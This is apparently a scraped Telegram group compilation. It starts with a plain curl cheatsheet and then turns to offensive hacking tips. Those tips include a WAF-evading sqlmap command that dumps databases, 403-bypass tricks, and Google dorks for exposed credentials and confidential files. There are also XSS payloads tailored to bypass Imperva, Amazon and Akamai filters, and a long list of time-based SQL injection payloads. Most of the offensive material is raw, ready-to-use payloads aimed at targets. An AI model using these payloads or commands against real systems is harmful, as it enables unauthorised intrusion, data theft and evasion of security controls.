Termux All Command [Telegram Group]

curl https://www.example.com curl -i https://www.example.com curl -o output.html https://www.example.com curl -o myfile.zip https://www.example.com/file.zip curl -L https://www.example.com curl -X POST https://www.example.com curl -d "param1=value1&param2=value2" -X POST https://www.example.com curl -H "Content-Type: application/json" -d '{"key":"value"}' -X POST https://www.example.com curl -H "Authorization: Bearer YOUR_TOKEN" https://www.example.com curl -H "Header1: value1" -H "Header2: value2" https://www.example.com curl -u username:password https://www.example.com curl -O https://www.example.com/file.zip curl -o /dev/null -s -w "%{http_code}\n" https://www.example.com curl -x http://proxyserver:port https://www.example.com curl -A "MyUserAgent/1.0" https://www.example.com curl --limit-rate 100K https://www.example.com curl -F "file=@/path/to/file.txt" https://www.example.com/upload curl -# -O https://www.example.com/file.zip curl -v https://www.example.com curl --connect-timeout 5 https://www.example.com curl -k https://self-signed.badssl.com/ curl -G "https://api.example.com/data" --data-urlencode "id=123" curl -X POST https://api.example.com/submit -d "name=John&age=30" curl -X POST https://api.example.com/data -H "Content-Type: application/json" -d '{"name":"John", "age":30}' curl -H "Authorization: Bearer token" https://api.example.com/protected curl -I https://www.example.com curl --limit-rate 100K https://www.example.com/file.zip curl -T myfile.txt ftp://ftp.example.com/ curl -u user:pass https://www.example.com/protected curl -b cookies.txt https://www.example.com curl -s https://www.example.com curl -X DELETE https://api.example.com/resource/1 curl -F "file=@image1.png" -F "file=@image2.png" https://api.example.com/upload

Curl Command Cheatsheet

Bypass WAF for use of sqlmap 🤯 sqlmap -u "https://target.com" --dbs --level=5 --risk=3 --user-agent -v3 --tamper="between,randomcase,space2comment" --batch --dump

Hiiii bug hunters Alot time Im Back First Time Based SQL Injection Status Code 301 Tip: Use This Command to get powerful endpoints to test XSS,SQLI katana -list targets.txt -silent -d 6 -rl 25 -jc -f qurl

Some ways to bypass 403 1- using space symbols exmaple: /admin -> 403 /admin%09 -> 200 /admin%20 -> 200 2- use traversal Example: /admin -> 403 /..;/admin -> 200 you can fuzz with traversal sometimes that's end with results Example: /..;/FUZZ

Information-gathering Tools: 🔸 Nmap (Network Mapper) - https://nmap.org/ 🔸 Wireshark - https://www.wireshark.org/ 🔸 Recon-ng - https://lnkd.in/dyj8ajD 🔸 theHarvester - https://lnkd.in/dJVgcFq 🔸 Shodan - https://www.shodan.io/ 🔸 Google Dorking - https://lnkd.in/gGxAxASv 🔸 OSINT Framework - https://lnkd.in/gEhmb-D 🔸 SpiderFoot - https://lnkd.in/gKtkNxVt 🔸 dnsenum - https://lnkd.in/gcz7Eghh 🔸 Amass - https://lnkd.in/dwfGpGUd

🔖Top Sites To Explore Public Files - 2024 🟢Find public files in Amazon S3 🖥 Website: 🔗 https://s3digger.com 🟢Find public files in Dropbox 🖥 Website: 🔗 https://drodigger.com 🟢Find public files in Disk Yandex 🖥 Website: 🔗 https://yadigger.com 🟢Find public files in Google Drive 🖥 Website: 🔗 https://drodigger.com 🟢Find public files in Telegram Server 🖥 Website: 🔗 https://teledigger.com 🟢Find public files in other file sharing sites 🖥 Website: 🔗 https://fidigger.com 🟢Find public files on url shortening sites 🖥 Website: 🔗 https://shortdigger.com

Here are some of the best vulnerability scanners you should consider: • Nessus 🛡 - https://lnkd.in/eE9595z • OpenVAS 🔓 - https://www.openvas.org/ • Qualys ☁️ - https://www.qualys.com/ • Nikto 🌐 - https://lnkd.in/dbUuvajK • Rapid7 Nexpose ⚙️ - https://lnkd.in/dYSbnx3A • Acunetix 🖥 - https://www.acunetix.com/ • OpenSCAP 📊 - https://www.open-scap.org/ • Microsoft Baseline Security Analyzer (MBSA) 🏢 - https://lnkd.in/gTbbjRei • Burp Suite 🍽 - https://lnkd.in/eiTFszA • OWASP ZAP ⚡️ - https://www.zaproxy.org/

Tools for searching emails for a specific domain: snov.io/email-finder experte.com/email-finder https://github.com/Josue87/EmailFinder github.com/GiJ03/Infoga infoga.io findemail.io hunter.io/domain-search https://lnkd.in/dnxusa4M minelead.io

🚀 Quick Tip: Find Subdomains Using RapidDNS 🕵️‍♂️ Want a fast and efficient way to discover subdomains? Add this simple function to your .bash_profile to leverage the RapidDNS API: rapiddns() { curl -s "https://lnkd.in/gzbkHQ3W" \ | grep -oP '_blank">\K[^<]*' \ | grep -v http \ | sort -u } You can use it like this: rapiddns http://target.com

1. Waybackurl - Historical URLs fetcher [https://lnkd.in/guJhyH_E] 2. Vulners Web Scanner - Vulnerability database [https://lnkd.in/gpQjx8Ni 3. Vt4Browsers - VirusTotal extension [https://lnkd.in/g97nb_c6] 4. Wayback Machine - Web archive tool [https://lnkd.in/g2NMzs7Z] 5. Shodan - Internet-connected devices scanner [https://lnkd.in/guJhyH_E] 6. TempMail - Disposable email provider [https://lnkd.in/g7TWBBx9] 7. Retire.js - JavaScript dependency scanner [https://lnkd.in/g-e6ZCGx 8. Privacy Badger - Tracker blocker [https://lnkd.in/gtkQMG7m] 9. OWASP Penetration Testing Kit - Security testing tools[https://lnkd.in/gKP2ZPZz] 10. Max HackBar - Pentesting toolbar [https://lnkd.in/ghvGNFmA] 11. Link Gopher - URL extractor [https://lnkd.in/g4FyHUcp] 12. Hunter - Email discovery tool [https://lnkd.in/gZCMDnzn] 13. Hack-Tools - Pentesting resources [https://lnkd.in/g6bjD4TW] 14. FoxyProxy - Proxy switcher [https://lnkd.in/gCR-iFbX] 15. Firefox Multi-Account Containers - Tab isolation [https://lnkd.in/gSBEQ8Uk 16. Dark Reader - Dark mode extension [https://lnkd.in/gJwaQ7cT] 17. Cookie-Editor - Cookie management [https://lnkd.in/gAVG9QKQ] 18. Bulk URL Opener - Mass URL opener [https://lnkd.in/gr4JuzqG] 19. Wappalyzer - Technology profiler [https://lnkd.in/gj2bcRiK] 20. WhatRuns - Tech stack identifier [https://lnkd.in/gyeKjSyW]

Google Dorks for Bug Bounty PHP extension w/ parameters site:http://example.com ext:php inurl:? API Endpoints site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3 Juicy Extensions site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json High % inurl keywords inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com Server Errors inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com XSS prone parameters inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:http://example.com Open Redirect prone parameters inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:http://example.com SQLi Prone Parameters inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:http://example.com SSRF Prone Parameters inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:http://example.com LFI Prone Parameters inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:http://example.com RCE Prone Parameters inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:http://example.com File upload endpoints site:http://example.com ”choose file” API Docs inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"http://example.com" Login Pages inurl:login | inurl:signin | intitle:login | intitle:signin | inurl:secure site:example[.]com Test Environments inurl:test | inurl:env | inurl:dev | inurl:staging | inurl:sandbox | inurl:debug | inurl:temp | inurl:internal | inurl:demo site:http://example.com Sensitive Documents site:http://example.com ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute” Sensitive Parameters inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:http://example.com Adobe Experience Manager (AEM) inurl:/content/usergenerated | inurl:/content/dam | inurl:/jcr:content | inurl:/libs/granite | inurl:/etc/clientlibs | inurl:/content/geometrixx | inurl:/bin/wcm | inurl:/crx/de site:http://example.com

XSS WAF Bypass: Imperva

<details/open/id="&quote;"ontoggle=[JS]>

Amazon

<details/open/id="&quote;"ontoggle=[JS]>

Akamai

<details open id="' &quote;'"ontoggle=[JS]>

timebased payloads for different dbms:

XOR(if(now()=sysdate(),sleep(7),0))XOR%23 'or sleep(7)--# 'or sleep(7)# 'or sleep(7)='# 'or sleep(7)='-- '/*F*/or/*F*/sleep(7)=' 'or sleep(7)--%23 'or sleep(7)%23 'or sleep(7);%00 or sleep(7)--+- or sleep(7)# '/*f*/or/*f*/sleep/*f*/(7)--# '/*f*/or/*f*/sleep/*f*/(7)# or sleep(7)%23 '/*f*/or/*f*/sleep/*f*/(7)--%23 '/*f*/or/*f*/sleep/*f*/(7)%23 '/*f*/or/*f*/sleep/*f*/(7);%00 or/*f*/sleep/*f*/(7)--+- or/*f*/sleep/*f*/(7)# 'XOR(if(now()=sysdate(),sleep(7),0))XOR' 'OR(if(now()=sysdate(),sleep(7),0))--# 'OR(if(now()=sysdate(),sleep(7),0))# or/*f*/sleep/*f*/(7)%23 'OR(if(now()=sysdate(),sleep(7),0))--%23 'OR(if(now()=sysdate(),sleep(7),0))%23 'OR(if(now()=sysdate(),sleep(7),0));%00 OR(if(now()=sysdate(),sleep(7),0))--+- OR(if(now()=sysdate(),sleep(7),0))# OR(if(now()=sysdate(),sleep(7),0))%23 'WAITFORDELAY'0:0:7';%00 'WAITFORDELAY'0:0:7'# 'WAITFORDELAY'0:0:7'%23 'WAITFORDELAY'0:0:7';%00 WAITFORDELAY'0:0:7'# WAITFORDELAY'0:0:7'%23 WAITFORDELAY'0:0:7'--+- 'WAITFORDELAY'0:0:7'--+- 'WAITFORDELAY'0:0:7'=' \/*F*/or/*f*/sleep(7)%23 '/*f*/OR/*f*/pg_sleep(7)# '/*f*/OR/*f*/pg_sleep(7)%23 '/*f*/OR/*f*/pg_sleep(7);%00 /*f*/OR/*f*/pg_sleep(70)--+- /*f*/OR/*f*/pg_sleep(70)# /*f*/OR/*f*/pg_sleep(70)%23 '/*f*/OR/*f*/pg_sleep(7)=';%00 \)/*F*/or/*f*/sleep(7)%23 \)/*F*/or/*f*/sleep(7)%23 %E2%84%A2%27/*F*/or/*f*/sleep(7)%23 %E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23 %E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23 %E2%84%A2%22/*F*/or/*f*/sleep(7)%23 %E2%84%A2%22/*F*/or/*f*/sleep(7)--+- %E2%84%A2\)/*F*/or/*f*/sleep(7)--+- %E2%84%A2%27)/*F*/or/*f*/sleep(7)--+- %E2%84%A2'/*F*/or/*f*/sleep(7)=' %E2%84%A2')/*F*/or/*f*/sleep(7)='

XSS Finder: https://github.com/faiyazahmad07/xss_vibes https://github.com/s0md3v/XSStrike python3 main.py -u www.abc.xyz/product-list.php?search= python3 xsstrike.py -u www.abc.xyz/product-list.php?search=

#XSS Today is my lucky day 😎 💰 <details open ontoggle​=content['al'%2B'ert'](1) >